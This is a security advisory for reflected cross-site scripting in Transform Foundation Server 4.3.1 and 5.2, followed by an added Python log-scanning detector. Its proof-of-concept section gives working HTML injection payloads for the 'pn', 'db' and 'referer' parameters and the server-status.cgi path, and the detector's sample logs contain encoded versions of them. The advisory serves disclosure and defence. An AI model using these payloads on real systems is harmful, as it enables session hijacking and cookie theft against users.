packetstorm | Juan Francisco | PACKETSTORM:126907
History: Jun 03, 2014 - 12:00 a.m.

Transform Foundation Server 4.3.1 / 5.2 Cross Site Scripting

packetstormsecurity.com

EPSS: 0.006 (Low), percentile 77.7%

`I. VULNERABILITY  
  
-------------------------  
  
Reflected XSS vulnerabilities in Transform Foundation Server 4.3.1  
and 5.2 from Bottomline Technologies  
  
  
II. BACKGROUND  
  
-------------------------  
  
Bottomline offers powerful, next-generation electronic document solutions  
for formatting, personalizing and delivering ERP and business application output.  
  
  
III. DESCRIPTION  
  
-------------------------  
  
Several reflected XSS vulnerabilities have been detected in Transform  
Foundation Server 4.3.1 and 5.2.  
  
  
1. XSS on GET parameters:  
  
  
http://XXXXXXXXX/TransformContentCenter/index.fsp/document.pdf?pn="XSS CODE"  
  
http://XXXXXXXXXXXXX/"XSS CODE"server-status.cgi  
  
  
  
2. XSS on POST parameters:  
  
  
URL: XXXXXXXXX/TransformContentCenter/index.fsp/index.fsp  
  
PARAMETERS:  
  
  
db="XSS CODE"  
referer="XSS CODE"  
  
  
  
  
IV. PROOF OF CONCEPT  
  
-------------------------  
  
  
GET:  
  
The application does not validate the parameter "pn" correctly.  
  
  
http://XXXXXXXXX/TransformContentCenter/index.fsp/document.pdf?pn=</i></p><BODY  
ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>  
  
http://XXXXXXXXXXXXX/<BODY  
ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>server-status.cgi  
  
  
POST:  
  
The application does not validate the parameters "db" and "referer"  
correctly.  
  
  
XXXXXXXXX/TransformContentCenter/index.fsp/index.fsp  
  
  
db=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>  
  
and  
  
referer=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')  
  
  
  
  
V. BUSINESS IMPACT  
  
-------------------------  
  
An attacker can execute arbitrary HTML or script code in the context  
of a targeted user's browser, allowing cookie theft and session  
hijacking, thus enabling full access to the box.  
  
  
  
VI. SYSTEMS AFFECTED  
  
-------------------------  
  
Transform Foundation Server 4.3.1  
Transform Foundation Server 5.2  
  
  
  
VII. SOLUTION  
-------------------------  
  
  
Patches released by the vendor are available on the customer portal;  
information is available here:  
  
  
Transform Foundation Server 4.3.1 Patch 8:  
  
http://www.pdf-archive.com/2014/06/03/tf52patch7releasenotes/preview/page/14/  
  
SF2351630  
SF2364411  
SF2391461  
  
  
Transform Foundation Server 5.2 Patch 7:  
  
  
http://www.pdf-archive.com/2014/06/03/tf52patch7releasenotes/preview/page/14/  
  
  
SF2351630  
SF2364411  
SF2391461  
  
  
  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2577  
  
Detected and reported by J. Francisco Bolivar (es.linkedin.com/in/jfbolivar/)  
`
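
An added detection example (not part of the original advisory and not vendor code): a Python check of web access logs for the two GET vectors described above, markup in the `pn` parameter of `index.fsp` and markup in the path of a `server-status.cgi` request. The log lines are constructed samples, and the combined log format and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

MARKUP = re.compile(r'[<>"]')  # characters that let a reflected value break out of HTML
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')  # request field of the log line

def decode(value, rounds=3):
    """URL-decode repeatedly so double-encoded markup (%253C) is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return a finding for one access-log line, or None if it looks clean."""
    match = REQUEST.search(line)
    if not match:
        return None
    parts = urlsplit(match.group("target"))
    path = decode(parts.path)
    # GET vector 1: markup in the "pn" query parameter of index.fsp
    if "/TransformContentCenter/index.fsp" in path:
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name == "pn" and MARKUP.search(decode(value)):
                return "markup in pn parameter"
    # GET vector 2: markup placed in the path of a server-status.cgi request
    if path.endswith("server-status.cgi") and MARKUP.search(path):
        return "markup in server-status.cgi path"
    return None

def scan(lines):
    """Return (line_number, finding) for every flagged line."""
    return [(n, hit) for n, line in enumerate(lines, 1) if (hit := classify(line))]

SAMPLE_LOG = [  # constructed lines, not taken from a real server
    '203.0.113.5 - - [03/Jun/2014:10:00:00 +0000] "GET /TransformContentCenter/index.fsp/document.pdf?pn=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [03/Jun/2014:10:00:07 +0000] "GET /TransformContentCenter/index.fsp/document.pdf?pn=%3C/i%3E%3CBODY%20ONLOAD=alert(1)%3E HTTP/1.1" 200 734',
    '203.0.113.9 - - [03/Jun/2014:10:00:09 +0000] "GET /%253CBODY%2520ONLOAD=alert(1)%253Eserver-status.cgi HTTP/1.1" 404 512',
    '203.0.113.7 - - [03/Jun/2014:10:00:11 +0000] "GET /server-status.cgi HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(f"line {number}: {finding}")
```

The `db` and `referer` POST vectors travel in the request body, which a standard access log does not record, so covering them needs body inspection at a proxy or WAF.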
